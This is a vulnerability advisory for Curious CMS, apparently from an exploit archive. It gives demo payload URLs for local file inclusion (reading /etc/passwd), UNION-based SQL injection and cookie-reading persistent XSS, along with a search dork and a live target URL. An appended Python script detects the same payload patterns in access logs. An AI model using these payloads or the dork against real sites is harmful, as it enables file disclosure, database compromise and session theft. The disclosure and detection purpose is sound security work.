Curious Cms Multiple Vulns

2010.11.28
Credit: Metropolis
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

####################################################################
.:. Author : Metropolis
.:. Home : www.metropolis.fr.cr
.:. Script : Curious Cms
.:. Version : n/a
.:. Vulnerable App : http://www.curious.be/?action=onderdeel&onderdeel=40&titel=Diensten
.:. Bug Type : Multiple Vulnerabilities / LFI / SQL Injections / XSS
.:. Dork : powered by Curious.be
####################################################################

Local File Inclusion

[ Vulnerable File 1 ]
www.site.com/index.php?action=[LFI]

[ Demo ]
www.site.com/index.php?action=../../../../../../../../../../../../../../../../../../../../etc/passwd%00

SQL Injections

[ Vulnerable File 2 ]
www.site.com/?titel=Nederlands&setLanguage=[SQL]

[ Demo ]
www.site.com/?titel=Nederlands&setLanguage=1+and+1=0+union+select+1,2,3,4,5--

Persistent XSS

[ Vulnerable File 3 ]
www.site.com/?action=[XSS]

[ Demo ]
www.site.com/?action=<script>alert(document.cookie);</script>

####################################################################
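
Added example, not part of the original advisory and not Curious CMS code: a defender-side check that flags access-log request targets matching the three parameter issues listed above. The expected value shapes for action and setLanguage are assumptions inferred from the URLs in the advisory, and the sample request targets are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumed shapes of legitimate values, inferred from the URLs in the advisory
# (action=onderdeel, setLanguage=1); adjust to the real site before use.
EXPECTED = {
    "action": re.compile(r"[A-Za-z0-9_-]{1,64}"),
    "setLanguage": re.compile(r"[0-9]{1,4}"),
}

# Labels for the three bug classes named in the advisory.
SIGNATURES = [
    ("lfi", re.compile(r"\.\.[/\\]|\x00")),
    ("sqli", re.compile(r"\bunion\b.*\bselect\b|--\s*$", re.I | re.S)),
    ("xss", re.compile(r"<\s*/?\s*script\b", re.I)),
]

def classify(request_target):
    """Return [(param, label)] for each watched parameter whose decoded
    value does not fully match its expected shape."""
    findings = []
    query = urlsplit(request_target).query
    # parse_qsl percent-decodes, so %00 and %3Cscript%3E are seen decoded.
    for name, value in parse_qsl(query, keep_blank_values=True):
        expected = EXPECTED.get(name)
        if expected is None or expected.fullmatch(value):
            continue
        label = next((lab for lab, rx in SIGNATURES if rx.search(value)),
                     "unexpected-value")
        findings.append((name, label))
    return findings

def scan(targets):
    """Map each flagged request target to its findings."""
    results = {t: classify(t) for t in targets}
    return {t: hits for t, hits in results.items() if hits}

# Constructed request targets (not taken from a real log).
SAMPLES = [
    "/index.php?action=onderdeel&onderdeel=40&titel=Diensten",
    "/index.php?action=../../../../etc/passwd%00",
    "/?titel=Nederlands&setLanguage=1+and+1=0+union+select+1,2,3,4,5--",
    "/?action=%3Cscript%3Ealert(document.cookie);%3C/script%3E",
    "/?titel=Nederlands&setLanguage=2",
]

if __name__ == "__main__":
    for target, hits in scan(SAMPLES).items():
        print(hits, target)
```

The same two shape checks (identifier-only action, numeric setLanguage) are what server-side input validation for these parameters would enforce before the values reach an include, a query, or the page output.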



Copyright 2019, cxsecurity.com

 
